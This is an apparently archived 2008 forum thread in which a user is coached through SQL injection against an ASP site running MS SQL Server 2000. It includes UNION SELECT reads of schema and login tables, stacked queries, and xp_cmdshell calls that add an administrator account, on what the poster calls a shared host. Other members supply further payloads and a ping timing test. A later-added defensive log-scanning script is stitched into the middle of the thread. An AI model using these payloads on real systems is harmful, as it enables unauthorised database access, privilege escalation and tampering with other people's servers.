IT Security and Insecurity Portal |
|
|
SQL HELP |
|
Posted: Mon Apr 14, 2008 3:22 pm |
|
|
Snap |
Active user |
|
|
Joined: Apr 14, 2008 |
Posts: 25 |
|
|
|
|
|
|
|
I start with
NULL HAVING 1=1--
to get one column
then i do
NULL GROUP BY *****,*****,****,***** HAVING 1=1--
and go and go until i have a valid page (the ***** represents columns)
then i do
NULL UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 FROM INFORMATION_SCHEMA.tables WHERE xtype='U'--
and that gives me a valid page, with all those numbers in different fields
then i do
NULL UNION SELECT null,null,null,null,null,null,null,null,null,null,table_name,null,null,null,null FROM INFORMATION_SCHEMA.tables--
and i get, one field with "_DELETE_" value, what does it mean ?
i do too
NULL UNION SELECT null,null,null,null,null,null,null,null,null,null,@@version,null,null,null,null FROM INFORMATION_SCHEMA.tables--
and i get,
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
***
I'm stuck here, what i need to do now to get admin of the DB or to change information or read sensitive data, etc ... ? Help me plz !
cheers ! |
|
|
|
|
|
|
|
|
Posted: Mon Apr 14, 2008 6:47 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Try read "master..syslogins". Find out, if you have DBA privileges. If so, then you can get shell access to database server operating system.
Modifications - you can concatenate multiple sql queries in M$sql 2000.
So this will work: "22;UPDATE some_table SET title='Pwned!!';--"
What you need to know, is database's information schema - table names, columns, etc. This will show you where "good" information is located
So you must interact with INFORMATION_SCHEMA |
|
|
|
|
|
|
|
|
Posted: Mon Apr 14, 2008 7:10 pm |
|
|
Oilik |
Active user |
|
|
Joined: Mar 05, 2008 |
Posts: 35 |
|
|
|
|
|
|
|
waraxe wrote: | Try read "master..syslogins". Find out, if you have DBA privileges. If so, then you can get shell access to database server operating system.
Modifications - you can concatenate multiple sql queries in M$sql 2000.
So this will work: "22;UPDATE some_table SET title='Pwned!!';--"
What you need to know, is database's information schema - table names, columns, etc. This will show you where "good" information is located
So you must interact with INFORMATION_SCHEMA |
yeah, but I don't like testing out to see if I have privileges when I'm doing that. I just jump straight to using xp..cmdshell. |
|
|
|
|
|
|
|
|
Posted: Mon Apr 14, 2008 11:33 pm |
|
|
Snap |
Active user |
|
|
Joined: Apr 14, 2008 |
Posts: 25 |
|
|
|
|
|
|
|
waraxe wrote: | Try read "master..syslogins". Find out, if you have DBA privileges. If so, then you can get shell access to database server operating system.
Modifications - you can concatenate multiple sql queries in M$sql 2000.
So this will work: "22;UPDATE some_table SET title='Pwned!!';--"
What you need to know, is database's information schema - table names, columns, etc. This will show you where "good" information is located
So you must interact with INFORMATION_SCHEMA |
Hey man many thx for your answer !
when i do
NULL UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM master..syslogins--
i get
Permits SELECT denied for the column 'password', object 'syslogins', database 'master', owner 'dbo'.
/***.asp, line 18
what can i do now ?
thanks in advance |
|
|
|
|
Posted: Tue Apr 15, 2008 11:54 pm |
|
|
Snap |
Active user |
|
|
Joined: Apr 14, 2008 |
Posts: 25 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Wed Apr 16, 2008 10:39 am |
|
|
Oilik |
Active user |
|
|
Joined: Mar 05, 2008 |
Posts: 35 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Wed Apr 16, 2008 10:27 pm |
|
|
Snap |
Active user |
|
|
Joined: Apr 14, 2008 |
Posts: 25 |
|
|
|
|
|
|
|
i followed everything from that video
i did
null;exec master..xp_cmdshell 'net user guest 123456 /add';--
and i got a valid page !
then
null;exec master..xp_cmdshell 'net localgroup administrators guest /add';--
valid page too !
i was like WOW INCREDIBLE
then i opened the "Remote Desktop"
and here is the problem
WHERE /HOW DO I GET THE IP ? IS THE SAME OF THE PAGE ?
i entered the same ip of the page doing a resolve, and i got "cannot connect bla bla bla"
plus i think is a shared hosted ... plz help me
cheers ! |
|
|
|
|
|
|
|
|
Posted: Wed Apr 16, 2008 10:52 pm |
|
|
Oilik |
Active user |
|
|
Joined: Mar 05, 2008 |
Posts: 35 |
|
|
|
|
|
|
|
Snap wrote: | i followed everything from that video
i did
null;exec master..xp_cmdshell 'net user guest 123456 /add';--
and i got a valid page !
then
null;exec master..xp_cmdshell 'net localgroup administrators guest /add';--
valid page too !
i was like WOW INCREDIBLE
then i opened the "Remote Desktop"
and here is the problem
WHERE /HOW DO I GET THE IP ? IS THE SAME OF THE PAGE ?
i entered the same ip of the page doing a resolve, and i got "cannot connect bla bla bla"
plus i think is a shared hosted ... plz help me
cheers ! |
Well, you may not be able to do RDC, but you can execute other commands though. So try:
null;exec master..xp_cmdshell 'SYSTEMINFO';--
And see if that spits out anything. |
|
|
|
|
|
|
|
|
Posted: Fri Apr 18, 2008 2:30 am |
|
|
Snap |
Active user |
|
|
Joined: Apr 14, 2008 |
Posts: 25 |
|
|
|
|
|
|
|
Oilik wrote: |
Well, you may not be able to do RDC, but you can execute other commands though. So try:
null;exec master..xp_cmdshell 'SYSTEMINFO';--
And see if that spits out anything. |
i used
null;exec master..xp_cmdshell 'SYSTEMINFO';--
and i get a valid page with nothing in it .. |
|
|
|
|
Posted: Fri Apr 18, 2008 3:07 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
First you must be sure that shell access is working. Try this:
Code: |
null;exec master..xp_cmdshell 'ping -n 20 localhost';--
|
If you can access shell, then delay > 20 seconds can be observed |
|
|
|
|
|
|
|
|
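Seen from the defender's side, each step tried in this thread (HAVING/GROUP BY probes, UNION reads of metadata, stacked xp_cmdshell calls, the ping delay test) leaves a recognisable trace in the web server log. The following is an added example, not part of the original thread: a small log scanner whose field layout, page name /news.asp, IP addresses and 10-second delay threshold are all constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines in a simplified W3C layout (assumed field order):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status time-taken(ms)
SAMPLE_LOG = """\
2008-04-14 15:20:01 203.0.113.7 GET /news.asp id=22 200 31
2008-04-14 15:20:40 203.0.113.7 GET /news.asp id=NULL+HAVING+1%3D1-- 500 40
2008-04-14 15:22:10 203.0.113.7 GET /news.asp id=NULL+UNION+SELECT+null,table_name+FROM+INFORMATION_SCHEMA.tables-- 200 55
2008-04-14 15:25:00 203.0.113.7 GET /news.asp id=NULL+UNION+SELECT+null,%40%40version-- 200 48
2008-04-16 22:20:00 203.0.113.7 GET /news.asp id=null%3Bexec+master..xp_cmdshell+%27ping+-n+20+localhost%27%3B-- 200 20400
2008-04-18 03:40:00 203.0.113.7 GET /news.asp id=null%3Bexec+master..xp_cmdshell+%27ping+-n+20+localhost%27%3B-- 200 38
2008-04-18 09:00:00 198.51.100.9 GET /news.asp id=union+station+tickets 200 29
"""

# Stage name -> pattern, matched on the decoded, lower-cased query string.
RULES = {
    "error_probe": re.compile(r"\bhaving\s+1\s*=\s*1|\bgroup\s+by\b.*\bhaving\b"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "metadata_read": re.compile(r"information_schema\.|\bsyslogins\b|@@version"),
    "stacked_query": re.compile(r";\s*(exec|execute|update|insert|delete|drop)\b"),
    "os_command": re.compile(r"\bxp_cmdshell\b"),
}

def normalize(query):
    """Undo URL encoding (twice, for double-encoded input), drop /**/ comments, collapse spaces."""
    text = unquote_plus(unquote_plus(query))
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).lower()

def scan(log_text, delay_ms=10000):
    """One finding per matching request; command_ran is set when an os_command hit was also slow."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 8 or line.startswith("#"):
            continue  # skip W3C header lines and malformed rows
        date, time, ip, _method, stem, query, _status, taken = parts
        hits = [name for name, rx in RULES.items() if rx.search(normalize(query))]
        if hits:
            findings.append({
                "when": f"{date} {time}", "ip": ip, "page": stem, "stages": hits,
                "command_ran": "os_command" in hits and int(taken) >= delay_ms,
            })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["when"], f["ip"], f["page"], ",".join(f["stages"]), "RAN" if f["command_ran"] else "")
```

A hit with command_ran set is the case to escalate first: the response time shows the database login could reach the operating system, which points to an over-privileged application account as well as the injectable parameter.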
Posted: Fri Apr 18, 2008 3:43 am |
|
|
Snap |
Active user |
|
|
Joined: Apr 14, 2008 |
Posts: 25 |
|
|
|
|
|
|
|
waraxe wrote: | First you must be sure that shell access is working. Try this:
Code: |
null;exec master..xp_cmdshell 'ping -n 20 localhost';--
|
If you can access shell, then delay > 20 seconds can be observed |
OMG ! waraxe you appeared again in my thread, what an honor !!
I think i can't enter to the shell, because the ping delay doesn't work
but, i HAVE to be able to do something with all this data, don't i ?
Server name = SVRPUBLICADOR
DB name = planet
user = backoffice_pm
version = Microsoft SQL Server 2000 - 8.00.2039
NULL UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM master..syslogins--
Permits SELECT denied for the column 'password', object 'syslogins', database 'master', owner 'dbo'.
i can't do nothing with all that. how do i interact with INFORMATION_SCHEMA ? BTW, i am learning a lot thx !! |
|
|
|
|
|
|
|
|
Posted: Sat Apr 19, 2008 9:51 am |
|
|
Snap |
Active user |
|
|
Joined: Apr 14, 2008 |
Posts: 25 |
|
|
|
|
|
|
|
Waraaaaaaaaaaaxe
bump !!!! |
All times are GMT